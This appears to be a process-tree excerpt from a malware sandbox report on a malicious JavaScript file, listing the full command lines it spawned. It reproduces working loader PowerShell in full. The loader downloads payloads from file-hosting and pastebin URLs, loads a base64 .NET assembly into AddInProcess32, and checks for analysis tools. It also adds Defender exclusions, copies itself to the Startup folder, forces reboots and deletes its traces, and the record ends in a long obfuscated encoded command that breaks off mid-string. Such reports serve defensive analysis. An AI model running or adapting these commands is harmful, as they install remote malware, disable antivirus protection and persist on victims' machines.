      • powershell.exe (PID: 2980 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$LTkZZ = $host.Version.Major.Equals(2);If ( $LTkZZ ) {$fbKNY = ([System.IO.Path]::GetTempPath());del ($fbKNY + '\Upwin.msu');$ngsdp = 'https://files.catbox.moe/sakuuo.msu';$menos = 'https://files.catbox.moe/6sdjc5.msu';$EhgVw = $env:PROCESSOR_ARCHITECTURE.Contains('64');if ( $EhgVw ) {$ngsdp = $menos ;}else {$ngsdp = ($ngsdp) ;};$ykhyn = ( New-Object Net.WebClient ) ;$ykhyn.Encoding = [System.Text.Encoding]::UTF8 ;$ykhyn.DownloadFile($ngsdp, ($fbKNY + '\Upwin.msu') ) ;$fVDsW = ( 'C:\Users\' + [Environment]::UserName );$bJTXj = ( $fbKNY + '\Upwin.msu' ) ; powershell.exe wusa.exe $bJTXj /quiet /norestart ; Copy-Item 'C:\Users\user\Downloads\F-2025-0855\F-2025-0855.js' -Destination ( $fVDsW + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ;[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;if((get-process 'Wireshark','apateDNS','analyze' -ea SilentlyContinue) -eq $Null){ } else{ Restart-Computer -force ; exit ; } ;$Stringbase;Function BaseMy{;$EATVh = [System.Text.Encoding]::UTF8.GetString([system.Convert]::FromBase64String($Stringbase));return $EATVh;};$nhqvr = ('https://pastebin.com/raw/bYrRPs5M' );$cZNqf = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$vfjrD = $webClient.DownloadString( $nhqvr ) ;$Stringbase = $vfjrD; $vfjrD = BaseMy;$vfjrD | Out-File -FilePath $cZNqf -Encoding 'UTF8' -force ;$lyjkG = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$BKrSR = New-Object System.Net.WebClient ;$BKrSR.Encoding = [System.Text.Encoding]::UTF8 ;$nFuQG = ( Get-Content -Path $cZNqf ) ;$lDMXc = $BKrSR.DownloadData( $nFuQG ) ;$SXRcf = [System.Text.Encoding]::UTF8.GetString($lDMXc);$SXRcf | Out-File -FilePath $lyjkG -force ;$EuTZA = '$tfYIo = ( [System.IO.Path]::GetTempPath() + ''dll02.txt'') ;$ryaeG = (Get-Content -Path $tfYIo -Encoding UTF8);' ;$EuTZA += '[Byte[]] $EATVh = [system.Convert]::FromBase64String( $ryaeG.replace(''?:?'',''A'') ) ;' ;$EuTZA += '[System.AppDomain]:' + ':CurrentDomain.Load( $EATVh ).' ;$EuTZA += 'GetType( ''ClassLibrary3.Class1'' ).GetM' ;$EuTZA += 'ethod( ''prFVI'' ).Invoke( $null , [object[]] ( ''txt.5202-YzX-dAeRpS-MeR/moc.seplaenohreruemed//:sptth'' , ''C:\Users\user\Downloads\F-2025-0855\F-2025-0855.js'' , ''D DDc:\windows\microsoft.net\framework\v4.0.30319\addinprocess32'' ) );';$XvCTi = ([System.IO.Path]::GetTempPath() + 'dll03.ps1') ;$EuTZA | Out-File -FilePath $XvCTi -force ;powershell -ExecutionPolicy Bypass -File $XvCTi ;};" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • powershell.exe (PID: 7308 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\dll03.ps1 MD5: 04029E121A0CFA5991749937DD22A1D9)
          • cmd.exe (PID: 344 cmdline: cmd.exe /c ping 127.0.0.1 -n 1 & del "C:\Users\user\AppData\Local\Temp\DLL01.txt" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • PING.EXE (PID: 5796 cmdline: ping 127.0.0.1 -n 1 MD5: 2F46799D79D22AC72C241EC0322B011D)
          • cmd.exe (PID: 5672 cmdline: cmd.exe /c ping 127.0.0.1 -n 1 & del "C:\Users\user\AppData\Local\Temp\DLL02.txt" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • PING.EXE (PID: 5828 cmdline: ping 127.0.0.1 -n 1 MD5: 2F46799D79D22AC72C241EC0322B011D)
          • cmd.exe (PID: 7640 cmdline: cmd.exe /c ping 127.0.0.1 -n 1 & del "C:\Users\user\AppData\Local\Temp\DLL31.ps1" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • PING.EXE (PID: 4344 cmdline: ping 127.0.0.1 -n 1 MD5: 2F46799D79D22AC72C241EC0322B011D)
          • cmd.exe (PID: 3760 cmdline: cmd.exe /c mkdir "C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • powershell.exe (PID: 7696 cmdline: powershell $S = 'C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\' ; Add-MpPreference -ExclusionPath $S -force ; MD5: 04029E121A0CFA5991749937DD22A1D9)
          • powershell.exe (PID: 7748 cmdline: powershell $S = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\' ; Add-MpPreference -ExclusionPath $S -force ; MD5: 04029E121A0CFA5991749937DD22A1D9)
          • cmd.exe (PID: 4132 cmdline: cmd.exe /c ping 127.0.0.1 -n 1 & copy "C:\Users\user\Downloads\F-2025-0855\F-2025-0855.js" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\F-2025-0855.js" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • PING.EXE (PID: 5752 cmdline: ping 127.0.0.1 -n 1 MD5: 2F46799D79D22AC72C241EC0322B011D)
          • cmd.exe (PID: 7996 cmdline: cmd.exe /c ping 127.0.0.1 -n C:\Users\user\Downloads\F-2025-0855\F-2025-0855.js & del "1" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • PING.EXE (PID: 5764 cmdline: ping 127.0.0.1 -n C:\Users\user\Downloads\F-2025-0855\F-2025-0855.js MD5: 2F46799D79D22AC72C241EC0322B011D)
          • cmd.exe (PID: 7580 cmdline: cmd.exe /c del "C:\Users\user\Downloads\F-2025-0855\F-2025-0855.js" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 8104 cmdline: cmd.exe /c "powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\qdnjv.ps1'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • powershell.exe (PID: 1912 cmdline: powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\qdnjv.ps1' MD5: 04029E121A0CFA5991749937DD22A1D9)
              • powershell.exe (PID: 8204 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -file "C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\qdnjv.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
          • cmd.exe (PID: 7556 cmdline: cmd.exe /c "powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\vogrr.ps1'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • powershell.exe (PID: 7540 cmdline: powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\vogrr.ps1' MD5: 04029E121A0CFA5991749937DD22A1D9)
              • powershell.exe (PID: 1284 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -file "C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\vogrr.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
          • powershell.exe (PID: 1468 cmdline: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\itncx.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
            • powershell.exe (PID: 8248 cmdline: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\puzvn.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
              • powershell.exe (PID: 9084 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\vogrr.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
            • AddInProcess32.exe (PID: 8436 cmdline: #by-unknown MD5: 9827FF3CDF4B83F9C86354606736CA9C)
          • cmd.exe (PID: 1180 cmdline: cmd.exe /c del "C:\Users\user\Downloads\F-2025-0855\F-2025-0855.js" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • wscript.exe (PID: 7784 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\Downloads\F-2025-0855\F-2025-0855.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 7280 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $WgkXZ = 'JA' + [char]66 + 'MAFQAaw' + [char]66 + 'aAFoAIAA9ACAAJA' + [char]66 + 'oAG8Acw' + [char]66 + '0AC4AVg' + [char]66 + 'lAHIAcw' + [char]66 + 'pAG8AbgAuAE0AYQ' + [char]66 + 'qAG8AcgAuAEUAcQ' + [char]66 + '1AGEAbA' + [char]66 + 'zACgAMgApADsASQ' + [char]66 + 'mACAAKAAgACQATA' + [char]66 + 'UAGsAWg' + [char]66 + 'aACAAKQAgAHsAJA' + [char]66 + 'mAGIASw' + [char]66 + 'OAFkAIAA9ACAAKA' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4ASQ' + [char]66 + 'PAC4AUA' + [char]66 + 'hAHQAaA' + [char]66 + 'dADoAOg' + [char]66 + 'HAGUAdA' + [char]66 + 'UAGUAbQ' + [char]66 + 'wAFAAYQ' + [char]66 + '0AGgAKAApACkAOw' + [char]66 + 'kAGUAbAAgACgAJA' + [char]66 + 'mAGIASw' + [char]66 + 'OAFkAIAArACAAJw' + [char]66 + 'cAFUAcA' + [char]66 + '3AGkAbgAuAG0Acw' + [char]66 + '1ACcAKQA7ACQAbg' + [char]66 + 'nAHMAZA' + [char]66 + 'wACAAPQAgACcAaA' + [char]66 + '0AHQAcA' + [char]66 + 'zADoALwAvAGYAaQ' + [char]66 + 'sAGUAcwAuAGMAYQ' + [char]66 + '0AGIAbw' + [char]66 + '4AC4AbQ' + [char]66 + 'vAGUALw' + [char]66 + 'zAGEAaw' + [char]66 + '1AHUAbwAuAG0Acw' + [char]66 + '1ACcAOwAkAG0AZQ' + [char]66 + 'uAG8AcwAgAD0AIAAnAGgAdA' + [char]66 + '0AHAAcwA6AC8ALw' + [char]66 + 'mAGkAbA' + [char]66 + 'lAHMALg' + [char]66 + 'jAGEAdA' + [char]66 + 'iAG8AeAAuAG0Abw' + [char]66 + 'lAC8ANg' + [char]66 + 'zAGQAag' + [char]66 + 'jADUALg' + [char]66 + 'tAHMAdQAnADsAJA' + [char]66 + 'FAGgAZw' + [char]66 + 'WAHcAIAA9ACAAJA' + [char]66 + 'lAG4AdgA6AFAAUg' + [char]66 + 'PAEMARQ' + [char]66 + 'TAFMATw' + [char]66 + 'SAF8AQQ' + [char]66 + 'SAEMASA' + [char]66 + 'JAFQARQ' + [char]66 + 'DAFQAVQ' + [char]66 + 'SAEUALg' + [char]66 + 'DAG8Abg' + [char]66 + '0AGEAaQ' + [char]66 + 'uAHMAKAAnADYANAAnACkAOw' + [char]66 + 'pAGYAIAAoACAAJA' + [char]66 + 'FAGgAZw' + [char]66 + 'WAHcAIAApACAAewAkAG4AZw' + [char]66 + 'zAGQAcAAgAD0AIAAkAG0AZQ' + [char]66 + 'uAG8AcwAgADsAfQ' + [char]66 + 'lAGwAcw' + [char]66 + 'lACAAewAkAG4AZw' + [char]66 + 'zAGQAcAAgAD0AIAAoACQAbg' + [char]66 + 'nAHMAZA' + [char]66 + 'wACkAIAA7AH0AOwAkAHkAaw' + [char]66 + 'oAHkAbgAgAD0AIAAoACAATg' + [char]66 + 'lAHcALQ' + [char]66 + 'PAGIAag' + [char]66 + 'lAGMAdAAgAE4AZQ' + [char]66 + '0AC4AVw' + [char]66 + 'lAGIAQw' + [char]66 + 'sAGkAZQ' + [char]66 + 'uAHQAIAApACAAOwAkAHkAaw' + [char]66 + 'oAHkAbgAuAEUAbg' + [char]66 + 'jAG8AZA' + [char]66 + 'pAG4AZwAgAD0AIA' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4AVA' + [char]66 + 'lAHgAdAAuAEUAbg' + [char]66 + 'jAG8AZA' + [char]66 + 'pAG4AZw' + [char]66 + 'dADoAOg' + [char]66 + 'VAFQARgA4ACAAOwAkAHkAaw' + [char]66 + 'oAHkAbgAuAEQAbw' + [char]66 + '3AG4AbA' + [char]66 + 'vAGEAZA' + [char]66 + 'GAGkAbA' + [char]66 + 'lACgAJA' + [char]66 + 'uAGcAcw' + [char]66 + 'kAHAALAAgACgAJA' + [char]66 + 'mAGIASw' + [char]66 + 'OAFkAIAArACAAJw' + [char]66 + 'cAFUAcA' + [char]66 + '3AGkAbgAuAG0Acw' + [char]66 + '1ACcAKQAgACkAIAA7ACQAZg' + [char]66 + 'WAEQAcw' + [char]66 + 'XACAAPQAgACgAIAAnAEMAOg' + [char]66 + 'cAFUAcw' + [char]66 + 'lAHIAcw' + [char]66 + 'cACcAIAArACAAWw' + [char]66 + 'FAG4Adg' + [char]66 + 'pAHIAbw' + [char]66 + 'uAG0AZQ' + [char]66 + 'uAHQAXQA6ADoAVQ' + [char]66 + 'zAGUAcg' + [char]66 + 'OAGEAbQ' + [char]66 + 'lACAAKQA7ACQAYg' + [char]66 + 'KAFQAWA' + [char]66 + 'qACAAPQAgACgAIAAkAGYAYg' + [char]66 + 'LAE4AWQAgACsAIAAnAFwAVQ' + [char]66 + 'wAHcAaQ' + [char]66 + 'uAC4AbQ' + [char]66 + 'zAHUAJwAgACkAIAA7ACAAcA' + [char]66 + 'vAHcAZQ' + [char]66 + 'yAHMAaA' + [char]66 + 'lAGwAbAAuAGUAeA' + [char]66 + 'lACAAdw' + [char]66 + '1AHMAYQAuAGUAeA' + [char]66 + 'lACAAJA' + [char]66 + 'iAEoAVA' + [char]66 + 'YAGoAIAAvAHEAdQ' + [char]66 + 'pAGUAdAAgAC8Abg' + [char]66 + 'vAHIAZQ' + [char]66 + 'zAHQAYQ' + [char]66 + 'yAHQAIAA7ACAAQw' + [char]66 + 'vAHAAeQAtAEkAdA' + [char]66 + 'lAG0AIAAnACUARA' + [char]66 + 'DAFAASg' + [char]66 + 'VACUAJwAgAC0ARA' + [char]66 + 'lAHMAdA' + [char]66 + 'pAG4AYQ' + [char]66 + '0AGkAbw' + [char]66 + 'uACAAKAAgACQAZg' + [char]66 + 'WAEQAcw' + [char]66 + 'XACAAKwAgACcAXA' + [char]66 + '' + [char]66 + 'AHAAcA' + [char]66 + 'EAGEAdA' + [char]66 + 'hAFwAUg' + [char]66 + 'vAGEAbQ' + [char]66 + 'pAG4AZw' + [char]66 + 'cAE0AaQ' + [char]66 + 'jAHIAbw' + [char]66 + 'zAG8AZg' + [char]66 + '0AFwAVw' + [char]66 + 'pAG4AZA' + [char]66 + 'vAHcAcw' + [char]66 + 'cAFMAdA' + [char]66 + 'hAHIAdAAgAE0AZQ' + [char]66 + 'uAHUAXA' + [char]66 + 'QAHIAbw' + [char]66 + 'nAHIAYQ' + [char]66 + 'tAHMAXA' + [char]66 + 'TAHQAYQ' + [char]66 + 'yAHQAdQ' + [char]66 + 'wACcAIAApACAALQ' + [char]66 + 'mAG8Acg' + [char]66 + 'jAGUAIAA7AHAAbw' + [char]66 + '3AGUAcg' + [char]66 + 'zAGgAZQ' + [char]66 + 'sAGwALg' + [char]66 + 'lAHgAZQAgAC0AYw' + [char]66 + 'vAG0AbQ' + [char]66 + 'hAG4AZAAgACcAcw' + [char]66 + 'sAGUAZQ' + [char]66 + 'wACAAMQA4ADAAJwA7ACAAcw' + [char]66 + 'oAHUAdA' + [char]66 + 'kAG8Adw' + [char]66 + 'uAC4AZQ' + [char]66 + '4AGUAIAAvAHIAIAAvAHQAIAAwACAALw' + [char]66 + 'mACAAfQ' + [char]66 + 'lAGwAcw' + [char]66 + 'lACAAew' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4ATg' + [char]66 + 'lAHQALg' + [char]66 + 'TAGUAcg' + [char]66 + '2AGkAYw' + [char]66 + 'lAFAAbw' + [char]66 + 'pAG4AdA' + [char]66 + 'NAGEAbg' + [char]66 + 'hAGcAZQ' + [char]66 + 'yAF0AOgA6AFMAZQ' + [char]66 + 'yAHYAZQ' + [char]66 + 'yAEMAZQ' + [char]66 + 'yAHQAaQ' + [char]66 + 'mAGkAYw' + [char]66 + 'hAHQAZQ' + [char]66 + 'WAGEAbA' + [char]66 + 'pAGQAYQ' + [char]66 + '0AGkAbw' + [char]66 + 'uAEMAYQ' + [char]66 + 'sAGwAYg' + [char]66 + 'hAGMAawAgAD0AIA' + [char]66 + '7ACQAdA' + [char]66 + 'yAHUAZQ' + [char]66 + '9ACAAOw' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4ATg' + [char]66 + 'lAHQALg' + [char]66 + 'TAGUAcg' + [char]66 + '2AGkAYw' + [char]66 + 'lAFAAbw' + [char]66 + 'pAG4AdA' + [char]66 + 'NAGEAbg' + [char]66 + 'hAGcAZQ' + [char]66 + 'yAF0AOgA6AFMAZQ' + [char]66 + 'jAHUAcg' + [char]66 + 'pAHQAeQ' + [char]66 + 'QAHIAbw' + [char]66 + '0AG8AYw' + [char]66 + 'vAGwAIAA9ACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAE4AZQ' + [char]66 + '0AC4AUw' + [char]66 + 'lAGMAdQ' + [char]66 + 'yAGkAdA' + [char]66 + '5AFAAcg' + [char]66 + 'vAHQAbw' + [char]66 + 'jAG8AbA' + [char]66 + 'UAHkAcA' + [char]66 + 'lAF0AOgA6AFQAbA' + [char]66 + 'zADEAMgAgADsAaQ' + [char]66 + 'mACgAKA' + [char]66 + 'nAGUAdAAtAHAAcg' + [char]66 + 'vAGMAZQ' + [char]66 + 'zAHMAIAAnAFcAaQ' + [char]66 + 'yAGUAcw' + [char]66 + 'oAGEAcg' + [char]66 + 'rACcALAAnAGEAcA' + [char]66 + 'hAHQAZQ' + [char]66 + 'EAE4AUwAnACwAJw' + [char]66 + 'hAG4AYQ' + [char]66 + 'sAHkAeg' + [char]66 + 'lACcAIAAtAGUAYQAgAFMAaQ' + [char]66 + 'sAGUAbg' + [char]66 + '0AGwAeQ' + [char]66 + 'DAG8Abg' + [char]66 + '0AGkAbg' + [char]66 + '1AGUAKQAgAC0AZQ' + [char]66 + 'xACAAJA' + [char]66 + 'OAHUAbA' + [char]66 + 'sACkAewAgAA0ACgAgACAAIAAgACAAIAAgAA0ACg' + [char]66 + '9AA0ACgANAAoAZQ' + [char]66 + 'sAHMAZQ' + [char]66 + '7ACAADQAKAFIAZQ' + [char]66 + 'zAHQAYQ' + [char]66 + 'yAHQALQ' + [char]66 + 'DAG8AbQ' + [char]66 + 'wAHUAdA' + [char]66 + 'lAHIAIAAtAGYAbw' + [char]66 + 'yAGMAZQAgADsADQAKACAAIAAgACAAIAAgAGUAeA' + [char]66 + 'pAHQAIAA7AA0ACgAgAH0AIAA7ACQAUw' + [char]66 + '0AHIAaQ' + [char]66 + 'uAGcAYg' + [char]66 + 'hAHMAZQA7AEYAdQ' + [char]66 + 'uAGMAdA' + [char]66 + 'pAG8AbgAgAEIAYQ' + [char]66 + 'zAGUATQ' + [char]66 + '5AHsAOwAkAEUAQQ' + [char]66 + 'UAFYAaAAgAD0AIA' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4AVA' + [char]66 + 'lAHgAdAAuAEUAbg' + [char]66 + 'jAG8AZA' + [char]66 + 'pAG4AZw' + [char]66 + 'dADoAOg' + [char]66 + 'VAFQARgA4AC4ARw' + [char]66 + 'lAHQAUw' + [char]66 + '0AHIAaQ' + [char]66 + 'uAGcAKA' + [char]66 + 'bAHMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4AQw' + [char]66 + 'vAG4Adg' + [char]66 + 'lAHIAdA' + [char]66 + 'dADoAOg' + [char]66 + 'GAHIAbw' + [char]66 + 'tAEIAYQ' + [char]66 + 'zAGUANgA0AFMAdA' + [char]66 + 'yAGkAbg' + [char]66 + 'nACgAJA' + [char]66 + 'TAHQAcg' + [char]66 + 'pAG4AZw' + [char]66 + 'iAGEAcw' + [char]66 + 'lACkAKQA7AHIAZQ' + [char]66 + '0AHUAcg' + [char]66 + 'uACAAJA' + [char]66 + 'FAEEAVA' + [char]66 + 'WAGgAOw' + [char]66 + '9ADsAJA' + [char]66 + 'uAGgAcQ' + [char]66 + '2AHIAIAA9ACAAKAAnAGgAdA' + [char]66 + '0AHAAcwA6AC8ALw' + [char]66 + 'wAGEAcw' + [char]66 + '0AGUAYg' + [char]66 + 'pAG4ALg' + [char]66 + 'jAG8AbQAvAHIAYQ' + [char]66 + '3AC8AYg' + [char]66 + 'ZAHIAUg' + [char]66 + 'QAHMANQ' + [char]66 + 'NACcAIAApADsAJA' + [char]66 + 'jAFoATg' + [char]66 + 'xAGYAIAA9ACAAKAAgAFsAUw' + [char]66 + '5AHMAdA' + [char]66 + 'lAG0ALg' + [char]66 + 'JAE8ALg' + [char]66 + 'QAGEAdA' + [char]66 + 'oAF0AOgA6AEcAZQ' + [char]66 + '0AFQAZQ' + [char]66 + 'tAHAAUA' + [char]66 + 'hAHQAaAAoACkAIAArACAAJw' + [char]66 + 'kAGwAbAAwADEALg' + [char]66 + '0AHgAdAAnACkAOwAkAHcAZQ' + [char]66 + 'iAEMAbA' + [char]66 + 'pAGUAbg' + [char]66 + '0ACAAPQAgAE4AZQ' + [char]66 + '3AC0ATw' + [char]66 + 'iAGoAZQ' + [char]66 + 'jAHQAIA' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAE4AZQ' + [char]66 + '0AC4AVw' + [char]66 + 'lAGIAQw' + [char]66 + 'sAGkAZQ' + [char]66 + 'uAHQAIAA7ACQAdg' + [char]66 + 'mAGoAcg' + [char]66 + 'EACAAPQAgACQAdw' + [char]66 + 'lAGIAQw' + [char]66 + 'sAGkAZQ' + [char]66 + 'uAHQALg' + [char]66 + 'EAG8Adw' + [char]66 + 'uAGwAbw' + [char]66 + 'hAGQAUw' + [char]66 + '0AHIAaQ' + [char]66 + 'uAGcAKAAgACQAbg' + [char]66 + 'oAHEAdg' + [char]66 + 'yACAAKQAgADsAJA' + [char]66 + 'TAHQAcg' + [char]66 + 'pAG4AZw' + [char]66 + 'iAGEAcw' + [char]66 + 'lACAAPQAgACQAdg' + [char]66 + 'mAGoAcg' + [char]66 + 'EADsAIAAkAHYAZg' + [char]66 + 'qAHIARAAgAD0AIA' + [char]66 + 'CAGEAcw' + [char]66 + 'lAE0AeQA7ACQAdg' + [char]66 + 'mAGoAcg' + [char]66 + 'EACAAfAAgAE8AdQ' + [char]66 + '0AC0ARg' + [char]66 + 'pAGwAZQAgAC0ARg' + [char]66 + 'pAGwAZQ' + [char]66 + 'QAGEAdA' + [char]66 + 'oACAAJA' + [char]66 + 'jAFoATg' + [char]66 + 'xAGYAIAAtAEUAbg' + [char]66 + 'jAG8AZA' + [char]66 + 'pAG4AZwAgACcAVQ' + [char]66 + 'UAEYAOAAnACAALQ' + [char]66 + 'mAG8Acg' + [char]66 + 'jAGUAIAA7ACQAbA' + [char]66 + '5AGoAaw' + [char]66 + 'HACAAPQAgACgAIA' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4ASQ' + [char]66 + 'PAC4AUA' + [char]66 + 'hAHQAaA' + [char]66 + 'dADoAOg' + [char]66 + 'HAGUAdA' + [char]66 + 'UAGUAbQ' + [char]66 + 'wAFAAYQ' + [char]66 + '0AGgAKAApACAAKwAgACcAZA' + [char]66 + 'sAGwAMAAyAC4AdA' + [char]66 + '4AHQAJwApACAAOwAkAEIASw' + [char]66 + 'yAFMAUgAgAD0AIA' + [char]66 + 'OAGUAdwAtAE8AYg' + [char]66 + 'qAGUAYw' + [char]66 + '0ACAAUw' + [char]66 + '5AHMAdA' + [char]66 + 'lAG0ALg' + [char]66 + 'OAGUAdAAuAFcAZQ' + [char]66 + 'iAEMAbA' + [char]66 + 'pAGUAbg' + [char]66 + '0ACAAOwAkAEIASw' + [char]66 + 'yAFMAUgAuAEUAbg' + [char]66 + 'jAG8AZA' + [char]66 + 'pAG4AZwAgAD0AIA' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4AVA' + [char]66 + 'lAHgAdAAuAEUAbg' + [char]66 + 'jAG8AZA' + [char]66 + 'pAG4AZw' + [char]66 + 'dADoAOg' + [char]66 + 'VAFQARgA4ACAAOwAkAG4ARg' + [char]66 + '1AFEARwAgACAAPQAgACgAIA' + [char]66 + 'HAGUAdAAtAEMAbw' + [char]66 + 'uAHQAZQ' + [char]66 + 'uAHQAIAAtAFAAYQ' + [char]66 + '0AGgAIAAkAGMAWg' + [char]66 + 'OAHEAZgAgACkAIAA7ACQAbA' + [char]66 + 'EAE0AWA' + [char]66 + 'jACAAPQAgACQAQg' + [char]66 + 'LAHIAUw' + [char]66 + 'SAC4ARA' + [char]66 + 'vAHcAbg' + [char]66 + 'sAG8AYQ' + [char]66 + 'kAEQAYQ' + [char]66 + '0AGEAKAAgACQAbg' + [char]66 + 'GAHUAUQ' + [char]66 + 'HACAAKQAgADsAJA' + [char]66 + 'TAFgAUg' + [char]66 + 'jAGYAIAA9ACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAFQAZQ' + [char]66 + '4AHQALg' + [char]66 + 'FAG4AYw' + [char]66 + 'vAGQAaQ' + [char]66 + 'uAGcAXQA6ADoAVQ' + [char]66 + 'UAEYAOAAuAEcAZQ' + [char]66 + '0AFMAdA' + [char]66 + 'yAGkAbg' + [char]66 + 'nACgAJA' + [char]66 + 'sAEQATQ' + [char]66 + 'YAGMAKQA7ACQAUw' + [char]66 + 'YAFIAYw' + [char]66 + 'mACAAfAAgAE8AdQ' + [char]66 + '0AC0ARg' + [char]66 + 'pAGwAZQAgAC0ARg' + [char]66 + 'pAGwAZQ' + [char]66 + 'QAGEAdA' + [char]66 + 'oACAAJA' + [char]66 + 'sAHkAag' + [char]66 + 'rAEcAIAAtAGYAbw' + [char]66 + 'yAGMAZQAgADsAJA' + [char]66 + 'FAHUAVA' + [char]66 + 'aAEEAIAA9ACAAJwAkAHQAZg' + [char]66 + 'ZAEkAbwAgAD0AIAAoACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAEkATwAuAFAAYQ' + [char]66 + '0AGgAXQA6ADoARw' + [char]66 + 'lAHQAVA' + [char]66 + 'lAG0AcA' + [char]66 + 'QAGEAdA' + [char]66 + 'oACgAKQAgACsAIAAnACcAZA' + [char]66 + 'sAGwAMAAyAC4AdA' + [char]66 + '4AHQAJwAnACkAIAA7ACQAcg' + [char]66 + '5AGEAZQ' + [char]66 + 'HACAAPQAgACgARw' + [char]66 + 'lAHQALQ' + [char]66 + 'DAG8Abg' + [char]66 + '0AGUAbg' + [char]66 + '0ACAALQ' + [char]66 + 'QAGEAdA' + [char]66 + 'oACAAJA' + [char]66 + '0AGYAWQ' + [char]66 + 'JAG8AIAAtAEUAbg' + [char]66 + 'jAG8AZA' + [char]66 + 'pAG4AZwAgAFUAVA' + [char]66 + 'GADgAKQA7ACcAIAA7ACQARQ' + [char]66 + '1AFQAWg' + [char]66 + '' + [char]66 + 'ACAAKwA9ACAAJw' + [char]66 + 'bAEIAeQ' + [char]66 + '0AGUAWw' + [char]66 + 'dAF0AIAAkAEUAQQ' + [char]66 + 'UAFYAaAAgAD0AIA' + [char]66 + 